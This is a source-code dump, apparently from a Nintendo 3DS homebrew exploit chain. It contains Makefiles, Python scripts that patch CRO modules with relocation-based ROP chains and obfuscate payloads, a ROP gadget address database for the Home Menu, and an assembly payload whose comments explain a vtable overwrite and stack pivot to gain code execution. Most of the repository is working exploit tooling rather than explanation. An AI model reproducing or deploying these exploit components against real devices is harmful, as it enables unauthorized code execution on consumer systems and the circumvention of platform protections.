export DEVKITARM=ctrulib/libctru") 7 | endif 8 | 9 | ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),) 10 | export PATH:=$(DEVKITARM)/bin:$(PATH) 11 | endif 12 | 13 | SCRIPTS = "../scripts" 14 | 15 | all: cn_qr_initial_loader.bin.png 16 | 17 | clean: 18 | @rm -f cn_qr_initial_loader.bin.png 19 | @cd WEST && make clean 20 | @cd JPN && make clean 21 | @echo "all cleaned up !" 22 | 23 | cn_qr_initial_loader.bin.png: 24 | @cd $(CNVERSION) && make 25 | @cp $(CNVERSION)/$@ ./ 26 | -------------------------------------------------------------------------------- /cn_save_initial_loader/Makefile: -------------------------------------------------------------------------------- 1 | ifeq ($(strip $(DEVKITARM)),) 2 | $(error "Please set DEVKITARM in your environment. export DEVKITARM=devkitARM") 3 | endif 4 | 5 | ifeq ($(strip $(CTRULIB)),) 6 | $(error "Please set CTRULIB in your environment. export DEVKITARM=ctrulib/libctru") 7 | endif 8 | 9 | ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),) 10 | export PATH:=$(DEVKITARM)/bin:$(PATH) 11 | endif 12 | 13 | SCRIPTS = "../scripts" 14 | 15 | all: cn_save_initial_loader.bin 16 | 17 | clean: 18 | @rm -f cn_save_initial_loader.bin 19 | @cd WEST && make clean 20 | @cd JPN && make clean 21 | @echo "all cleaned up !" 22 | 23 | cn_save_initial_loader.bin: 24 | @cd $(CNVERSION) && make 25 | @cp $(CNVERSION)/$@ ./ 26 | @python $(SCRIPTS)/obfuscator5000.py $@ 27 | -------------------------------------------------------------------------------- /cn_save_initial_loader/JPN/Makefile: -------------------------------------------------------------------------------- 1 | ifeq ($(strip $(DEVKITARM)),) 2 | $(error "Please set DEVKITARM in your environment. export DEVKITARM=devkitARM") 3 | endif 4 | 5 | ifeq ($(strip $(CTRULIB)),) 6 | $(error "Please set CTRULIB in your environment. 
export DEVKITARM=ctrulib/libctru") 7 | endif 8 | 9 | ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),) 10 | export PATH:=$(DEVKITARM)/bin:$(PATH) 11 | endif 12 | 13 | SCRIPTS = "../../scripts" 14 | NAME = cn_save_initial_loader 15 | 16 | .PHONY: all cn_initial/cn_initial.bin 17 | 18 | all: $(NAME).bin 19 | 20 | clean: 21 | @cd cn_initial && make clean 22 | @rm -f $(NAME).bin $(NAME).bin.png 23 | @echo "all cleaned up !" 24 | 25 | -include $(DFILES) 26 | 27 | $(NAME).bin: sploit_proto.bin sploit.s cn_initial/cn_initial.bin 28 | @armips sploit.s 29 | @python $(SCRIPTS)/obfuscator5000.py $< 30 | 31 | cn_initial/cn_initial.bin: 32 | $(MAKE) -C cn_initial 33 | -------------------------------------------------------------------------------- /cn_save_initial_loader/WEST/Makefile: -------------------------------------------------------------------------------- 1 | ifeq ($(strip $(DEVKITARM)),) 2 | $(error "Please set DEVKITARM in your environment. export DEVKITARM=devkitARM") 3 | endif 4 | 5 | ifeq ($(strip $(CTRULIB)),) 6 | $(error "Please set CTRULIB in your environment. export DEVKITARM=ctrulib/libctru") 7 | endif 8 | 9 | ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),) 10 | export PATH:=$(DEVKITARM)/bin:$(PATH) 11 | endif 12 | 13 | SCRIPTS = "../../scripts" 14 | NAME = cn_save_initial_loader 15 | 16 | .PHONY: all cn_initial/cn_initial.bin 17 | 18 | all: $(NAME).bin 19 | 20 | clean: 21 | @cd cn_initial && make clean 22 | @rm -f $(NAME).bin $(NAME).bin.png 23 | @echo "all cleaned up !" 
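24 | 25 | -include $(DFILES) 26 | 27 | $(NAME).bin: sploit_proto.bin sploit.s cn_initial/cn_initial.bin 28 | @armips sploit.s 29 | @python $(SCRIPTS)/obfuscator5000.py $< 30 | 31 | cn_initial/cn_initial.bin: 32 | $(MAKE) -C cn_initial 33 |
--------------------------------------------------------------------------------
/scripts/fixCRO.py:
--------------------------------------------------------------------------------
"""Recompute the three SHA-256 digests stored in the first 0x60 bytes of a CRO.

argv[1] is the CRO file; it is read, patched and written back in place.
"""
import sys
import hashlib


def getWord(b, k, n=4):
    """Read an n-byte little-endian unsigned integer from b at offset k."""
    return sum(b[k+c] << (c*8) for c in range(n))


def getHash(b, k, n):
    """Return the SHA-256 digest of b[k:k+n] as a bytearray."""
    # Hash the buffer that was passed in rather than a module-level global.
    return bytearray(hashlib.sha256(b[k:k+n]).digest())


crofn = sys.argv[1]
# crrfn=sys.argv[2]

with open(crofn, "rb") as f:
    crodata = bytearray(f.read())

# print([hex(v) for v in getHash(crodata,getWord(crodata, 0xB0),getWord(crodata, 0xB4))])

# The words at 0xB0, 0xB4 and 0xB8 delimit the hashed regions:
#   0x80 .. word(0xB0), then word(0xB4) bytes from there, then up to word(0xB8).
first_end = getWord(crodata, 0xB0)
second_len = getWord(crodata, 0xB4)
third_end = getWord(crodata, 0xB8)
second_end = first_end + second_len

crodata[0x00:0x20] = getHash(crodata, 0x80, first_end - 0x80)
crodata[0x20:0x40] = getHash(crodata, first_end, second_len)
crodata[0x40:0x60] = getHash(crodata, second_end, third_end - second_end)

# crrdata=bytearray(open(crrfn,"rb").read())
# crrdata[0x360:0x380]=getHash(crodata,0x00,0x80)

with open(crofn, "wb") as f:
    f.write(crodata)
# open(crrfn,"wb").write(crrdata)
--------------------------------------------------------------------------------
/scripts/makePatches.py:
--------------------------------------------------------------------------------
"""Run extractPatch.py once per patch region of oss.cro.

argv[1] is the directory that holds extractPatch.py. The region bounds
(CRO_PATCH0_OFFSET .. CRO_PATCH4_OFFSET, CRO_SIZE) come from `constants`.
"""
import os
import subprocess
import sys

sys.path.append(os.path.abspath(os.path.dirname(os.path.abspath(__file__))+"/../build/"))
from constants import *

scripts_dir = sys.argv[1]


def extract_patch(out_name, *region_args):
    """Invoke extractPatch.py for one output file with the given region arguments."""
    # The command is passed as an argument list, not a shell string, so a
    # scripts path containing spaces or shell metacharacters is handed to
    # python as a single argument. check=True stops the build on a failed
    # extraction instead of carrying on with a stale patch file.
    cmd = [
        "python",
        scripts_dir + "/extractPatch.py",
        "oss_cro/oss.cro",
        "oss_cro/out_oss.cro",
        "build/cro/" + out_name,
    ]
    cmd += [str(a) for a in region_args]
    subprocess.run(cmd, check=True)


extract_patch("patch0.bin", CRO_PATCH0_OFFSET, "0x60", "full")
extract_patch("patch1.bin", CRO_PATCH1_OFFSET, CRO_PATCH2_OFFSET)
extract_patch("patch2.bin", CRO_PATCH2_OFFSET, CRO_PATCH3_OFFSET)
extract_patch("patch3.bin", CRO_PATCH3_OFFSET, CRO_PATCH4_OFFSET)
extract_patch("patch4.bin", CRO_PATCH4_OFFSET, CRO_SIZE)
--------------------------------------------------------------------------------
/scripts/obfuscator5000.py:
--------------------------------------------------------------------------------
"""Replace every 0xDEADC0DE word of a file with a word sampled from the same file.

argv[1] is the file; it is rewritten in place.
"""
import sys
import random
import struct

#crappy obfuscation, but doesn't really cost us anything

magicWord=0xDEADC0DE


def getWord(b, k, n=4):
    """Read an n-byte little-endian unsigned integer from b at offset k."""
    return sum(b[k+c] << (c*8) for c in range(n))


def putWord(b, k, v):
    """Store v as a 4-byte word in b at offset k."""
    # "<I" pins the byte order to little-endian so that it matches getWord
    # on any host; a bare "I" would follow the host's native order.
    b[(k):(k+4)] = struct.pack("<I", v)


#todo : remove doubles ?
def findWords(d):
    """Collect the replacement candidates found in d.

    A word qualifies when it is neither the magic word nor zero and its top
    nibble is not 0xE. Only whole 4-byte words are scanned.
    """
    candidates = []
    for k in range(0, len(d) & ~0x3, 4):
        v = getWord(d, k)
        if v != magicWord and v != 0x0 and (v >> 28) != 0xE:
            candidates.append(v)
    return candidates


def obfuscate(d, l):
    """Overwrite each magic word of d, in place, with a random element of l."""
    # random.choice raises IndexError on an empty list, so this fails if d
    # holds a magic word while l has no candidates.
    for k in range(0, len(d) & ~0x3, 4):
        if getWord(d, k) == magicWord:
            putWord(d, k, random.choice(l))


with open(sys.argv[1], "rb") as f:
    data = bytearray(f.read())

words = findWords(data)
obfuscate(data, words)
# print("OBFUSCATOR 5000 TEMPORARILY DISABLED")
# print("DO NOT FORGET TO REENABLE")

with open(sys.argv[1], "wb") as f:
    f.write(data)
--------------------------------------------------------------------------------
/scripts/buildAll.py:
--------------------------------------------------------------------------------
"""Run `make clean` and `make` for every accepted version combination.

The optional flags --enableloadropbin and --enableotherapp append
LOADROPBIN=1 and OTHERAPP=1 to each make command line.
"""
import sys
import os
import itertools

# 0 : firm, 1 : cn, 2 : spider, 3 : ro


def isVersionPossible(v):
    """Tell whether the (firm, cn, spider, ro, menu) combination v is built."""
    if v[0] == "PRE5":
        return v[3] <= 1024 and v[2] <= 2050
    return v[3] >= 2049


firmVersions = ["POST5", "N3DS"]
cnVersions = ["WEST", "JPN"]
spiderVersions = [4096]
roVersions = [4096]
menuVersions = [11272, 12288, 13330, 15360, 16404, 17415, 19456, "20480_usa"]

a = [firmVersions, cnVersions, spiderVersions, roVersions, menuVersions]

extraparams = ""
for arg in sys.argv:
    if arg == "--enableloadropbin":
        extraparams += " LOADROPBIN=1"
    if arg == "--enableotherapp":
        extraparams += " OTHERAPP=1"

# Everything interpolated into the make command below comes from the fixed
# lists above or from the two literal flag strings, never from raw arguments.
cnt = 0
for v in itertools.product(*a):
    if not isVersionPossible(v):
        continue
    os.system("make clean")
    os.system("make FIRMVERSION="+str(v[0])+" CNVERSION="+str(v[1])+" SPIDERVERSION="+str(v[2])+" ROVERSION="+str(v[3])+" MENUVERSION="+str(v[4])+extraparams)
    cnt += 1

# Number of combinations that were built.
print(cnt)
--------------------------------------------------------------------------------
/cn_secondary_payload/source/text.c:
--------------------------------------------------------------------------------
1 | #include 2 | #include 3 |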
#include 4 | #include 5 | #include "text.h" 6 | #include "font_bin.h" 7 | 8 | #define CHAR_SIZE_X (8) 9 | #define CHAR_SIZE_Y (8) 10 | 11 | int _strlen(char* str); 12 | 13 | void drawCharacter(u8* fb, char c, u16 x, u16 y) 14 | { 15 | if(c<32)return; 16 | c-=32; 17 | u8* charData=(u8*)&font_bin[(CHAR_SIZE_X*CHAR_SIZE_Y*c)/8]; 18 | fb+=(x*240+y)*3; 19 | int i, j; 20 | for(i=0;i>=1; 29 | } 30 | fb+=(240-CHAR_SIZE_Y)*3; 31 | } 32 | } 33 | 34 | void drawString(u8* fb, char* str, u16 x, u16 y) 35 | { 36 | if(!str)return; 37 | y=232-y; 38 | int k; 39 | int dx=0, dy=0; 40 | for(k=0;k<_strlen(str);k++) 41 | { 42 | if(str[k]>=32 && str[k]<128)drawCharacter(fb,str[k],x+dx,y+dy); 43 | dx+=8; 44 | if(str[k]=='\n'){dx=0;dy-=8;} 45 | } 46 | } 47 | -------------------------------------------------------------------------------- /menu_payload/Makefile: -------------------------------------------------------------------------------- 1 | ifeq ($(strip $(DEVKITARM)),) 2 | $(error "Please set DEVKITARM in your environment. export DEVKITARM=devkitARM") 3 | endif 4 | 5 | ifeq ($(strip $(CTRULIB)),) 6 | $(error "Please set CTRULIB in your environment. export DEVKITARM=ctrulib/libctru") 7 | endif 8 | 9 | ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),) 10 | export PATH:=$(DEVKITARM)/bin:$(PATH) 11 | endif 12 | 13 | ROPBIN_FILENAME_SUFFIX := 14 | 15 | ifeq ($(FIRMVERSION),N3DS) 16 | ROPBIN_FILENAME_SUFFIX := _new3ds.bin 17 | else 18 | ROPBIN_FILENAME_SUFFIX := _old3ds.bin 19 | endif 20 | 21 | ifneq ($(strip $(LOADROPBIN)),) 22 | ROPBIN_CMD := menu_ropbin.bin 23 | endif 24 | 25 | SCRIPTS = "../scripts" 26 | 27 | all: menu_payload_regionfree.bin menu_payload_loadropbin.bin $(ROPBIN_CMD) 28 | 29 | clean: 30 | @rm -f menu_payload_regionfree.bin menu_payload_loadropbin.bin menu_ropbin.bin 31 | @echo "all cleaned up !" 
32 | 33 | menu_ropbin.bin: 34 | cp menu_ropbin_$(MENUVERSION)$(ROPBIN_FILENAME_SUFFIX) menu_ropbin.bin 35 | 36 | %.bin: %.s 37 | @armips $< 38 | -------------------------------------------------------------------------------- /cn_qr_initial_loader/JPN/Makefile: -------------------------------------------------------------------------------- 1 | ifeq ($(strip $(DEVKITARM)),) 2 | $(error "Please set DEVKITARM in your environment. export DEVKITARM=devkitARM") 3 | endif 4 | 5 | ifeq ($(strip $(CTRULIB)),) 6 | $(error "Please set CTRULIB in your environment. export DEVKITARM=ctrulib/libctru") 7 | endif 8 | 9 | ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),) 10 | export PATH:=$(DEVKITARM)/bin:$(PATH) 11 | endif 12 | 13 | SCRIPTS = "../../scripts" 14 | NAME = cn_qr_initial_loader 15 | 16 | .PHONY: all cn_initial/cn_initial.bin 17 | 18 | all: $(NAME).bin.png 19 | 20 | %.bin.png: %.bin 21 | @python $(SCRIPTS)/obfuscator5000.py $< 22 | @python $(SCRIPTS)/crypt.py $< $(SCRIPTS) 23 | @$(SCRIPTS)/qrcode.exe -8 -o $@ < tmp 24 | @rm tmp 25 | 26 | clean: 27 | @cd cn_initial && make clean 28 | @rm -f $(NAME).bin $(NAME).bin.png 29 | @echo "all cleaned up !" 30 | 31 | -include $(DFILES) 32 | 33 | $(NAME).bin: sploit_proto.bin sploit.s cn_initial/cn_initial.bin 34 | armips sploit.s 35 | 36 | cn_initial/cn_initial.bin: 37 | # probably a bad idea; dependencies won't work well i guess 38 | $(MAKE) -C cn_initial 39 | -------------------------------------------------------------------------------- /cn_qr_initial_loader/WEST/Makefile: -------------------------------------------------------------------------------- 1 | ifeq ($(strip $(DEVKITARM)),) 2 | $(error "Please set DEVKITARM in your environment. export DEVKITARM=devkitARM") 3 | endif 4 | 5 | ifeq ($(strip $(CTRULIB)),) 6 | $(error "Please set CTRULIB in your environment. 
export DEVKITARM=ctrulib/libctru") 7 | endif 8 | 9 | ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),) 10 | export PATH:=$(DEVKITARM)/bin:$(PATH) 11 | endif 12 | 13 | SCRIPTS = "../../scripts" 14 | NAME = cn_qr_initial_loader 15 | 16 | .PHONY: all cn_initial/cn_initial.bin 17 | 18 | all: $(NAME).bin.png 19 | 20 | %.bin.png: %.bin 21 | @python $(SCRIPTS)/obfuscator5000.py $< 22 | @python $(SCRIPTS)/crypt.py $< $(SCRIPTS) 23 | @$(SCRIPTS)/qrcode.exe -8 -o $@ < tmp 24 | @rm tmp 25 | 26 | clean: 27 | @cd cn_initial && make clean 28 | @rm -f $(NAME).bin $(NAME).bin.png 29 | @echo "all cleaned up !" 30 | 31 | -include $(DFILES) 32 | 33 | $(NAME).bin: sploit_proto.bin sploit.s cn_initial/cn_initial.bin 34 | armips sploit.s 35 | 36 | cn_initial/cn_initial.bin: 37 | # probably a bad idea; dependencies won't work well i guess 38 | $(MAKE) -C cn_initial 39 | -------------------------------------------------------------------------------- /cn_qr_initial_loader/JPN/cn_initial/source/text.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "text.h" 6 | #include "font_bin.h" 7 | 8 | #define CHAR_SIZE_X (8) 9 | #define CHAR_SIZE_Y (8) 10 | 11 | int _strlen(char* str); 12 | 13 | // void drawCharacter(u8* fb, char c, u16 x, u16 y) 14 | // { 15 | // if(c<32)return; 16 | // c-=32; 17 | // u8* charData=(u8*)&font_bin[(CHAR_SIZE_X*CHAR_SIZE_Y*c)/8]; 18 | // fb+=(x*240+y)*3; 19 | // int i, j; 20 | // for(i=0;i>=1; 28 | // } 29 | // fb+=(240-CHAR_SIZE_Y)*3; 30 | // } 31 | // } 32 | 33 | // void drawString(u8* fb, char* str, u16 x, u16 y) 34 | // { 35 | // if(!str)return; 36 | // y=232-y; 37 | // int k; 38 | // int dx=0, dy=0; 39 | // for(k=0;k<_strlen(str);k++) 40 | // { 41 | // if(str[k]>=32 && str[k]<128)drawCharacter(fb,str[k],x+dx,y+dy); 42 | // dx+=8; 43 | // if(str[k]=='\n'){dx=0;dy-=8;} 44 | // } 45 | // } 46 | -------------------------------------------------------------------------------- 
/cn_qr_initial_loader/WEST/cn_initial/source/text.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "text.h" 6 | #include "font_bin.h" 7 | 8 | #define CHAR_SIZE_X (8) 9 | #define CHAR_SIZE_Y (8) 10 | 11 | int _strlen(char* str); 12 | 13 | // void drawCharacter(u8* fb, char c, u16 x, u16 y) 14 | // { 15 | // if(c<32)return; 16 | // c-=32; 17 | // u8* charData=(u8*)&font_bin[(CHAR_SIZE_X*CHAR_SIZE_Y*c)/8]; 18 | // fb+=(x*240+y)*3; 19 | // int i, j; 20 | // for(i=0;i>=1; 28 | // } 29 | // fb+=(240-CHAR_SIZE_Y)*3; 30 | // } 31 | // } 32 | 33 | // void drawString(u8* fb, char* str, u16 x, u16 y) 34 | // { 35 | // if(!str)return; 36 | // y=232-y; 37 | // int k; 38 | // int dx=0, dy=0; 39 | // for(k=0;k<_strlen(str);k++) 40 | // { 41 | // if(str[k]>=32 && str[k]<128)drawCharacter(fb,str[k],x+dx,y+dy); 42 | // dx+=8; 43 | // if(str[k]=='\n'){dx=0;dy-=8;} 44 | // } 45 | // } 46 | -------------------------------------------------------------------------------- /cn_save_initial_loader/JPN/cn_initial/source/text.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "text.h" 6 | #include "font_bin.h" 7 | 8 | #define CHAR_SIZE_X (8) 9 | #define CHAR_SIZE_Y (8) 10 | 11 | int _strlen(char* str); 12 | 13 | // void drawCharacter(u8* fb, char c, u16 x, u16 y) 14 | // { 15 | // if(c<32)return; 16 | // c-=32; 17 | // u8* charData=(u8*)&font_bin[(CHAR_SIZE_X*CHAR_SIZE_Y*c)/8]; 18 | // fb+=(x*240+y)*3; 19 | // int i, j; 20 | // for(i=0;i>=1; 28 | // } 29 | // fb+=(240-CHAR_SIZE_Y)*3; 30 | // } 31 | // } 32 | 33 | // void drawString(u8* fb, char* str, u16 x, u16 y) 34 | // { 35 | // if(!str)return; 36 | // y=232-y; 37 | // int k; 38 | // int dx=0, dy=0; 39 | // for(k=0;k<_strlen(str);k++) 40 | // { 41 | // if(str[k]>=32 && str[k]<128)drawCharacter(fb,str[k],x+dx,y+dy); 42 | // dx+=8; 43 | // 
if(str[k]=='\n'){dx=0;dy-=8;} 44 | // } 45 | // } 46 | -------------------------------------------------------------------------------- /cn_save_initial_loader/WEST/cn_initial/source/text.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "text.h" 6 | #include "font_bin.h" 7 | 8 | #define CHAR_SIZE_X (8) 9 | #define CHAR_SIZE_Y (8) 10 | 11 | int _strlen(char* str); 12 | 13 | // void drawCharacter(u8* fb, char c, u16 x, u16 y) 14 | // { 15 | // if(c<32)return; 16 | // c-=32; 17 | // u8* charData=(u8*)&font_bin[(CHAR_SIZE_X*CHAR_SIZE_Y*c)/8]; 18 | // fb+=(x*240+y)*3; 19 | // int i, j; 20 | // for(i=0;i>=1; 28 | // } 29 | // fb+=(240-CHAR_SIZE_Y)*3; 30 | // } 31 | // } 32 | 33 | // void drawString(u8* fb, char* str, u16 x, u16 y) 34 | // { 35 | // if(!str)return; 36 | // y=232-y; 37 | // int k; 38 | // int dx=0, dy=0; 39 | // for(k=0;k<_strlen(str);k++) 40 | // { 41 | // if(str[k]>=32 && str[k]<128)drawCharacter(fb,str[k],x+dx,y+dy); 42 | // dx+=8; 43 | // if(str[k]=='\n'){dx=0;dy-=8;} 44 | // } 45 | // } 46 | -------------------------------------------------------------------------------- /menu_ropdb/17415_proto/ropdb.txt: -------------------------------------------------------------------------------- 1 | # format : ("ROP_GADGET_NAME", addr, word_size) 2 | # format : ("APP_CONSTANT_PTR", pattern_addr, pattern_word_size, value_words_offset) 3 | [ 4 | # pop gadgets 5 | ("ROP_MENU_POP_PC", 0x0010201c, 0x1), # pop {pc} 6 | ("ROP_MENU_POP_R0PC", 0x00157818, 0x1), # pop {r0, pc} 7 | ("ROP_MENU_POP_R1PC", 0x00236efc, 0x1), # pop {r1, pc} 8 | ("ROP_MENU_POP_R2R3R4R5R6PC", 0x0015040c, 0x1), # pop {r2, r3, r4, r5, r6, pc} 9 | ("ROP_MENU_POP_R4R5PC", 0x0012ccb8, 0x1), # pop {r4, r5, pc} 10 | 11 | # load gadgets 12 | ("ROP_MENU_STACK_PIVOT", 0x00100fb8, 0x1), # ldmdavc r4, {r4, r5, r8, sl, fp, ip, sp, pc} 13 | ("ROP_MENU_LDR_R0R0_POP_R4PC", 0x0011f5d0, 0x2), # ldr r0, [r0] ; pop 
{r4, pc} 14 | 15 | # store gadgets 16 | ("ROP_MENU_STREQ_R5R2x30_POP_R4R5R6PC", 0x001550fc, 0x2), # streq r5, [r2, #0x30] ; pop {r4, r5, r6, pc} 17 | 18 | # arithmetic gadgets 19 | ("ROP_MENU_AND_R0R0R4_POP_R4R5R6R7R8PC", 0x0011f148, 0x2), # and r0, r0, r4 ; pop {r4, r5, r6, r7, r8, pc} 20 | 21 | # comparison gadgets 22 | ("ROP_MENU_CMP_R0R1_MVNLS_R0x0_MOVHI_R0x1_POP_R4PC", 0x0021e6cc, 0x4), # cmp r0, r1 ; mvnls r0, #0 ; movhi r0, #1 ; pop {r4, pc} 23 | 24 | # functions 25 | ("ROP_MENU_SLEEPTHREAD", 0x0012b044, 0x2), # svc 0xa, bx lr 26 | ("ROP_MENU_NSS_REBOOT", 0x00137390, 0x4), # ends in "add sp, sp, #0xc ; ldmfd sp!, {r4,r5,pc}" 27 | ("MENU_NSS_HANDLE", 0x00137390, 0x4, 0x15), 28 | ] 29 | -------------------------------------------------------------------------------- /scripts/makeROP.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import os 3 | sys.path.append(os.path.abspath(os.path.dirname(os.path.abspath(__file__))+"/../build/")) 4 | from constants import * 5 | 6 | def getWord(b, k, n=4): 7 | return sum(list(map(lambda c: b[k+c]<<(c*8),range(n)))) 8 | 9 | def putWord(b, k, v, n=4): 10 | for c in range(n): 11 | b[k+c]=(v>>(c*8))&0xFF 12 | 13 | def writeRelocationPatch(b, i, a, v, s=0x1): 14 | s+=CRO_SEGMENT_OFFSET 15 | k=CRO_PATCH4_OFFSET+i*0xC 16 | putWord(b, k+0x0, (a<<4)|s) 17 | putWord(b, k+0x4, 0x00000302) 18 | putWord(b, k+0x8, v-CRO_RELOCATION_OFFSET) 19 | 20 | ropfn=sys.argv[1] 21 | crofn=sys.argv[2] 22 | outfn=sys.argv[3] 23 | 24 | ropdata=bytearray(open(ropfn,"rb").read()) 25 | crodata=bytearray(open(crofn,"rb").read()) 26 | 27 | #make segment2 just a bit larger so we can modify the segment table with relocation patches 28 | putWord(crodata, CRO_PATCH3_OFFSET, CRO_SEGMENT2_SIZE) 29 | 30 | segmentLocation=getWord(crodata, CRO_PATCH3_OFFSET-0x4) 31 | 32 | #patch to change segment1's address 33 | writeRelocationPatch(crodata, 0, (CRO_PATCH3_OFFSET-0x10)-segmentLocation, RO_ROP_START, 0x2) 34 | 35 
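| #actual ROP 36 | i=1 37 | for k in range(0,len(ropdata)-4,4): 38 | v=getWord(ropdata,k+4) 39 | if v!=0xDEADBABE: 40 | writeRelocationPatch(crodata, i, k+RO_ROP_OFFSET, v) 41 | i+=1 42 | 43 | #initial return address 44 | writeRelocationPatch(crodata, i, 0x00, getWord(ropdata,0)) 45 | 46 | open(outfn,"wb").write(crodata) 47 |
--------------------------------------------------------------------------------
/scripts/makeHeaders.py:
--------------------------------------------------------------------------------
"""Generate constant files for C (.h), assembly (.s) and Python (.py).

As read below: argv[1] to argv[5] are the firm, cn, spider, ro and menu
version strings, argv[6] is the output path prefix, and each further argument
is a file holding a Python literal list whose entries start with a name and a
value.
"""
from datetime import datetime
import sys
import ast


def outputConstantsH(d):
    """Render the entries of d as #define lines inside a CONSTANTS_H guard."""
    lines = ["#ifndef CONSTANTS_H", "#define CONSTANTS_H"]
    lines += [" #define "+k[0]+" "+str(k[1]) for k in d]
    lines.append("#endif")
    return "".join(line+"\n" for line in lines)


def outputConstantsS(d):
    """Render the entries of d as `NAME equ (value)` assembler lines."""
    return "".join(k[0]+" equ ("+str(k[1])+")"+"\n" for k in d)


def outputConstantsPY(d):
    """Render the entries of d as `NAME = (value)` Python assignments."""
    return "".join(k[0]+" = ("+str(k[1])+")"+"\n" for k in d)


# argv[6] (the output prefix) is required, so at least 7 entries are needed;
# a usage error exits non-zero so that a calling build stops here.
if len(sys.argv) < 7:
    print("use : "+sys.argv[0]+" ...")
    sys.exit(1)

# NOTE(review): names and values are pasted into the generated files without
# quoting or escaping. The .py output is a Python module, and other scripts in
# this tree run `from constants import *` from ../build/ -- if this output is
# that module, whoever can edit an input list or a version argument controls
# code that runs at build time. Treat the constants files as code under review.

# l=[("_SPIDER_VERSION", sys.argv[3]),
l = [("_RO_VERSION", sys.argv[4])]
l += [("FIRM_VERSION", "\""+sys.argv[1]+"\""),
      ("CN_VERSION", "\""+sys.argv[2]+"\""),
      ("SPIDER_VERSION", "\""+sys.argv[3]+"\""),
      ("RO_VERSION", "\""+sys.argv[4]+"\""),
      ("MENU_VERSION", "\""+sys.argv[5]+"\"")]
l += [("BUILDTIME", "\""+datetime.now().strftime("%Y-%m-%d %H:%M:%S")+"\"")]
l += [("HB_NUM_HANDLES", "16")]

for fn in sys.argv[7:]:
    with open(fn, "r") as f:
        s = f.read()
    # literal_eval accepts Python literals only; it does not execute code
    # from the list files. Empty files are skipped.
    if len(s) > 0:
        l += ast.literal_eval(s)

for suffix, render in ((".h", outputConstantsH), (".s", outputConstantsS), (".py", outputConstantsPY)):
    with open(sys.argv[6]+suffix, "w") as f:
        f.write(render(l))
--------------------------------------------------------------------------------
/menu_payload/menu_payload_loadropbin.s: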
-------------------------------------------------------------------------------- 1 | .nds 2 | 3 | .include "../build/constants.s" 4 | 5 | .create "menu_payload_loadropbin.bin",0x0 6 | 7 | MENU_OBJECT_LOC equ 0xBABE0000 ; for relocation 8 | 9 | ; basically we overwrite an object's data to get home menu to do what we want 10 | ; first we overwrite the vtable pointer so that we can get the code to jump to where we want 11 | ; the method we use for that is located at vtable + 0x8 12 | ; with that we can put a in our vtable to our stack pivot 13 | ; our stack pivot works by loading a bunch of registers from [r4] 14 | ; fortunately we know r4 = object + 0x4, so we manufacture our object accordingly 15 | ; and then we get ROP under home menu ! 16 | 17 | .orga 0x0 18 | 19 | object: 20 | .word MENU_OBJECT_LOC + vtable - object ; pointer to manufactured vtable, and new sp 21 | .word ROP_MENU_POP_PC ; pc (pop {pc} to jump to ROP) 22 | 23 | .word 0xDEADCAFE ; filler to avoid having stuff overwritten 24 | .word 0xDEADCAFE ; filler to avoid having stuff overwritten 25 | .word 0xDEADCAFE ; filler to avoid having stuff overwritten 26 | .word 0xDEADCAFE ; filler to avoid having stuff overwritten 27 | 28 | vtable: ; also initial ROP 29 | .word ROP_MENU_POP_R4R5PC ; pop {r4, r5, pc} : skip pivot 30 | .word MENU_OBJECT_LOC + ropload_stackpivot - object + 0x1c ; r4 31 | .word ROP_MENU_STACK_PIVOT ; stack pivot ; also r5 (garbage) 32 | rop: 33 | .word ROP_MENU_STACK_PIVOT ; stack-pivot to the main ROP from the ropbin. 
34 | 35 | ropload_stackpivot: 36 | .word 0, 0, 0, 0, 0, 0 37 | .word MENU_LOADEDROP_BUFADR ; sp 38 | .word ROP_MENU_POP_PC ; pc 39 | 40 | .fill ((object + 0x60) - .), 0x0 41 | 42 | .Close 43 | -------------------------------------------------------------------------------- /scripts/portRopDb.py: -------------------------------------------------------------------------------- 1 | from datetime import datetime 2 | import sys 3 | import ast 4 | 5 | def getWord(b, k, n=4): 6 | return sum(list(map(lambda c: b[k+c]<<(c*8),range(n)))) 7 | 8 | def findPattern(p, t, addr, size): 9 | pattern = [] 10 | for i in range(size): 11 | pattern += [getWord(p, addr + i*4, 4)] 12 | k = 0 13 | # not a perfect pattern search, but most likely good enough 14 | for i in range(0, len(t), 4): 15 | candidate = getWord(t, i, 4) 16 | if candidate == pattern[k]: 17 | if k+1 == size: 18 | return i-k*4 19 | else: 20 | k += 1 21 | elif candidate == pattern[0]: 22 | k = 1 23 | else: 24 | k = 0 25 | return None 26 | 27 | def outputConstantsTxt(d): 28 | out="[\n" 29 | for k in d: 30 | out+="(\""+k[0]+"\", \""+str(k[1])+"\"),\n" 31 | out+="]\n" 32 | return out 33 | 34 | if len(sys.argv)<4: 35 | print("use : "+sys.argv[0]+" ") 36 | exit() 37 | 38 | l = ast.literal_eval(open(sys.argv[-2],"r").read()) 39 | 40 | base = int(sys.argv[3], 0) 41 | proto = bytearray(open(sys.argv[1], "rb").read()) 42 | target = bytearray(open(sys.argv[2], "rb").read()) 43 | 44 | out = [] 45 | 46 | for entry in l: 47 | if len(entry) == 3: 48 | # gadget search 49 | (name, in_addr, in_size) = entry 50 | print(name) 51 | out_addr = findPattern(proto, target, in_addr - base, in_size) + base 52 | out += [(name, hex(out_addr))] 53 | if len(entry) == 4: 54 | # const ptr search 55 | (name, in_addr, in_size, in_offset) = entry 56 | out_addr = findPattern(proto, target, in_addr - base, in_size) 57 | out_addr = getWord(target, out_addr + in_offset*4, 4) 58 | out += [(name, hex(out_addr))] 59 | 60 | 
